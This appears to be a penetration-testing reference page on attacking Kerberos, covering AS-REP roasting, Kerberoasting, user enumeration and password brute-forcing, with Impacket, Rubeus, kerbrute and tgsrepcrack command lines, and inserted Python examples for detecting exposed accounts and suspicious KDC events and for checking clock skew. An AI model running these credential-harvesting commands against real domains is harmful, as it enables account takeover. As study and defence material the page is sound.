TCP 88: Kerberos


Last updated 3 years ago

Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

--

Related (the links are listed at the end of this page)

AS-REP Roasting

If Kerberos preauthentication is disabled for a user, the Key Distribution Center (KDC) just issues a Ticket Granting Ticket (TGT) for any user we request (AS_REQ), without requiring proof of the password first. Part of the reply (AS_REP) is encrypted using the user's password, and can then be cracked offline.

See also the links listed at the end of this page.

Requirements

  • Only works on user accounts that have Kerberos preauthentication disabled

  • List of potential usernames (may be queried from LDAP using a domain account)

Impacket

GetNPUsers.py <domain>/<username> -dc-ip <ip>

Rubeus

Rubeus.exe asreproast /user:<username> /dc:<ip> /domain:<domain> /outfile:hashes.txt /format:hashcat

kerbrute

Enumerate users

./kerbrute_linux_386 userenum -d <domain> --dc <domaincontroller> <usernames.txt>

Brute-force the password of one user

./kerbrute_linux_386 bruteuser -d <domain> --dc <domaincontroller> <password-list> <username@domain>

Kerberoasting

If we have access to any user account on the domain, we can request (TGS_REQ) Ticket Granting Service (TGS) tickets for any service account (using its SPN). The reply (TGS_REP) contains the TGS, encrypted with the service account's password, which can then be cracked offline.

Requirements

  • Only works on service accounts that have a Service Principal Name (SPN) set

  • Creds/User account on the domain (low priv is sufficient)
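Both weaknesses described above come down to things a defender can check directly: AS-REP roasting needs an enabled account with the DONT_REQ_PREAUTH bit set in userAccountControl, and Kerberoasting needs an SPN-bearing user account whose password a human chose and rarely rotates; on the KDC side, a 4768 event with pre-authentication type 0 and a 4769 event with RC4 (0x17) for a non-computer service account are the usual footprints. The Python below is an added example, not code from this page, Impacket or Rubeus. The account records, event lines, names and addresses are constructed samples, and the flattened `key=value` event format is an assumption made for the example (real 4768/4769 events carry these fields as structured event data).

```python
"""Audit accounts for AS-REP roasting / Kerberoasting exposure and flag the
matching KDC events.  Added example with constructed sample data."""
from datetime import datetime, timedelta, timezone

UF_ACCOUNTDISABLE = 0x2              # userAccountControl: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl: Kerberos pre-auth not required
RC4_HMAC = 0x17                      # TicketEncryptionType value for RC4-HMAC

NOW = datetime(2020, 3, 20, tzinfo=timezone.utc)  # constructed "current" time

# Constructed directory records (hypothetical names, not real data)
ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200, "servicePrincipalName": [],
     "objectClass": ["user"], "pwdLastSet": NOW - timedelta(days=30)},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "objectClass": ["user"], "pwdLastSet": NOW - timedelta(days=900)},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200,
     "servicePrincipalName": ["MSSQLSvc/db01.example.local:1433"], "objectClass": ["user"],
     "pwdLastSet": NOW - timedelta(days=1200)},
    {"sAMAccountName": "gmsa_web$", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.example.local"],
     "objectClass": ["user", "msDS-GroupManagedServiceAccount"], "pwdLastSet": NOW - timedelta(days=10)},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x200 | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": ["cifs/old.example.local"], "objectClass": ["user"],
     "pwdLastSet": NOW - timedelta(days=2000)},
]


def asrep_roastable(accounts):
    """Enabled accounts with pre-auth disabled: the KDC returns an AS-REP
    encrypted with their key to anyone who asks (the first requirement above)."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
                  and not a["userAccountControl"] & UF_ACCOUNTDISABLE)


def kerberoastable(accounts, now=NOW, max_pwd_age=timedelta(days=365)):
    """Enabled user accounts with an SPN: any domain user can request a TGS for
    them.  Group managed service accounts are skipped because their long,
    automatically rotated password is not a realistic cracking target; for the
    rest the password age is reported, since that is what the defender controls."""
    findings = {}
    for a in accounts:
        if not a["servicePrincipalName"] or a["userAccountControl"] & UF_ACCOUNTDISABLE:
            continue
        if "msDS-GroupManagedServiceAccount" in a["objectClass"]:
            continue
        age = (now - a["pwdLastSet"]).days
        findings[a["sAMAccountName"]] = {"spns": a["servicePrincipalName"],
                                         "pwd_age_days": age,
                                         "stale_password": age > max_pwd_age.days}
    return findings


# Constructed Security-log lines in a flattened key=value form (assumed format)
EVENTS = [
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=legacy_app PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=alice@EXAMPLE.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4769 TargetUserName=alice@EXAMPLE.LOCAL ServiceName=WEB01$ TicketEncryptionType=0x12 IpAddress=10.0.0.5",
]


def parse_event(line):
    """Split one flattened event line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split())


def suspicious_events(lines):
    """4768 with PreAuthType 0 is a TGT issued without pre-authentication (AS-REP
    roast candidate).  4769 with RC4 for a service that is not a computer
    account or krbtgt is the usual Kerberoasting footprint, because roasting
    tools commonly ask for RC4 to obtain the cheapest hash to crack."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev["EventID"] == "4768" and ev["PreAuthType"] == "0":
            alerts.append(("asrep_roast", ev["TargetUserName"], ev["IpAddress"]))
        elif (ev["EventID"] == "4769" and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
              and not ev["ServiceName"].endswith("$") and ev["ServiceName"] != "krbtgt"):
            alerts.append(("kerberoast", ev["ServiceName"], ev["IpAddress"]))
    return alerts


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(ACCOUNTS))
    print("Kerberoastable:", kerberoastable(ACCOUNTS))
    print("Alerts:", suspicious_events(EVENTS))
```

The account checks are the same conditions the tools above rely on (GetNPUsers.py looks for DONT_REQ_PREAUTH, GetUserSPNs.py for servicePrincipalName), so running them from the defender's side finds the exposure before someone else does; the event check is a starting point for a detection rule and should be tuned for legitimate RC4-only services in the environment.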

Impacket

GetUserSPNs.py <domain>/<username> -dc-ip <ip> -request

Rubeus

TODO

kerberoast

sudo apt install kerberoast
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <exported-tickets-file>

Sync time

Kerberos rejects requests whose timestamps fall outside the KDC's clock-skew tolerance, so it's necessary to sync the client time to the domain controller.

Error (when not synced)

SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate

ntpdate <dc-ip>

Manually

Get server time

nmap -sC -sV <ip>
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T00:14:12
|_  start_date: N/A

Set local time accordingly

date -s "20 Mar 2020 00:14:12+00:00"
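The skew value nmap prints is the difference between the target's clock and the scanning host's, and the KDC stops accepting requests once that difference exceeds its tolerance (5 minutes by default on both MIT krb5 and Windows KDCs). The Python below is an added example, not part of the original page or of nmap: it parses the `clock-skew` and `smb2-time` lines from the output above (embedded as a constant), decides whether a sync is needed, and renders the `date -s` string shown above from the server's time.

```python
"""Parse nmap clock-skew / smb2-time output and check it against the Kerberos
clock-skew tolerance.  Added example; the nmap output is the page's own sample."""
import re
from datetime import datetime, timedelta, timezone

KRB_MAX_SKEW = timedelta(minutes=5)  # default tolerance before KRB_AP_ERR_SKEW

# nmap host script output as shown on this page, embedded as a constant
NMAP_OUTPUT = """Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T00:14:12
|_  start_date: N/A
"""

# nmap duration syntax: optional sign, then any of 1d 2h 3m 4s
SKEW_RE = re.compile(r"^(?P<sign>-?)(?:(?P<d>\d+)d)?(?:(?P<h>\d+)h)?(?:(?P<m>\d+)m)?(?:(?P<s>\d+)s)?$")


def parse_skew(text):
    """'7h00m00s', '-2s' or '1d03h' -> timedelta, sign preserved."""
    m = SKEW_RE.match(text.strip())
    if not m or m.group(0) in ("", "-"):
        raise ValueError(f"unrecognised skew value: {text!r}")
    delta = timedelta(days=int(m["d"] or 0), hours=int(m["h"] or 0),
                      minutes=int(m["m"] or 0), seconds=int(m["s"] or 0))
    return -delta if m["sign"] else delta


def extract_nmap(output):
    """Return {'skew': timedelta, 'server_time': datetime} from nmap output.
    When nmap prints 'mean: ..., deviation: ..., median: ...' the median is used."""
    skew = server_time = None
    for line in output.splitlines():
        body = line.lstrip("|_ ").strip()       # drop nmap's tree prefix
        if body.startswith("clock-skew:"):
            value = body.split(":", 1)[1].strip()
            if "median:" in value:
                value = value.split("median:", 1)[1].strip()
            skew = parse_skew(value)
        elif body.startswith("date:"):
            server_time = datetime.fromisoformat(body.split(":", 1)[1].strip())
            server_time = server_time.replace(tzinfo=timezone.utc)  # smb2-time reports UTC
    return {"skew": skew, "server_time": server_time}


def needs_sync(skew, tolerance=KRB_MAX_SKEW):
    """True when the absolute skew exceeds the KDC tolerance, i.e. when a
    Kerberos request would fail with KRB_AP_ERR_SKEW."""
    return abs(skew) > tolerance


def date_set_command(server_time):
    """Render the `date -s` invocation used above from the server's UTC time."""
    return 'date -s "' + server_time.strftime("%d %b %Y %H:%M:%S") + '+00:00"'


if __name__ == "__main__":
    result = extract_nmap(NMAP_OUTPUT)
    print("skew:", result["skew"], "sync needed:", needs_sync(result["skew"]))
    print(date_set_command(result["server_time"]))
```

Prefer `ntpdate <dc-ip>` when it is available; the manual path is only for hosts where that is not possible, and setting the clock by hand is what the rendered command above does.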

kerbrute: a tool to perform Kerberos pre-auth bruteforcing (GitHub - ropnop/kerbrute)

kerberoast: use exported tickets from Mimikatz

Related

  • Wikipedia
  • Active Directory
  • TCP 389, 636, 3268, 3269: LDAP
  • Impacket

See also

  • GitHub: TarlogicSecurity/kerberos_attacks_cheatsheet.md
  • YouTube - Conda - Attacking Active Directory - AS-REP Roasting (AS-REP Roasting section)
  • YouTube - Conda - Attacking Active Directory - Kerberoasting (Kerberoasting section)